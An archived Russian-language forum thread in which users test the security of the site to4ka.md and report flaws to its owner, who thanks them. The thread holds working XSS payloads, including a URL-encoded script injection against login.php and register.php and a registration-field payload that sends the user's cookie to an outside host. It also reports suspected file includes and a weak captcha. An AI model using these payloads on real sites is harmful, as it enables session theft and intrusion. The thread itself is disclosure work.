PDA

Просмотр полной версии : www.to4ka.md

IIAHbI4
16.04.2009, 01:22
www.to4ka.md
FriLL
17.04.2009, 00:32
http://to4ka.md/image.php/img_4970f7cf0bf60.jpg?width=127&height=72&cropratio=2:1.1&image=/images/original/img_4970f7cf0bf60.jpg'
пути можно раскрыть (это пока что), вообще на инклуд похоже
to4ka
17.04.2009, 00:45
http://to4ka.md/image.php/img_4970f7cf0bf60.jpg?width=127&height=72&cropratio=2:1.1&image=/images/original/img_4970f7cf0bf60.jpg'
пути можно раскрыть (это пока что), вообще на инклуд похоже
Спасибо поправил!
Red_Red1
17.04.2009, 11:31
Для ИЕ можно выполнить ХСС атаку загрузив яваскрипт код в картинку, вот пример
http://www.to4ka.md/images/original/img_49e81ca9d64ca.jpg
to4ka
17.04.2009, 17:19
Для ИЕ можно выполнить ХСС атаку загрузив яваскрипт код в картинку, вот пример
http://www.to4ka.md/images/original/img_49e81ca9d64ca.jpg


Спасибо огромное всем кто тестит...
AKYLA
17.04.2009, 17:46
Уязвима переменная name
login.php?name=1%00'"><ScRiPt%20%0a%0d>alert('XSSKA')%3B</ScRiPt>&pwd=admin@admin.com&next=%D0%B4%D0%B0%D0%BB%D0%B5%D0%B5

/register.php?name=1%00'"><ScRiPt%20%0a%0d>alert('XSSKA')%3B</ScRiPt>&pwd=admin@admin.com&next=%D0%B4%D0%B0%D0%BB%D0%B5%D0%B5
IIAHbI4
28.04.2009, 19:42
UP
eLWAux
18.05.2009, 19:37
http://www.to4ka.md/
есть возможность выбора яз: "рус | rom"
там делаетса через js (файл /js/js.js) через ф-цию redirectWithLang
в куках (clang параметр) хранитса текущий яз.
если изменить его (clang) на ,например, rux, тогда увидем пустую страничку
возможно там инклуд)

чтоб убрать ето: сделай дефолтный яз)
MasterProg
12.06.2009, 20:05
На странице слабая капча. Одинаковые фон, позиция, длина, нет искажения. Можно написать декодер.

UPD: В форме регистрации пассивная XSS. Если ввести <img src=. onerror=document.location='http://www.google.com/search?q='+document.cookie>unexistant_login111 в логин и нажать "Проверить", перекинет на гугл с кукой.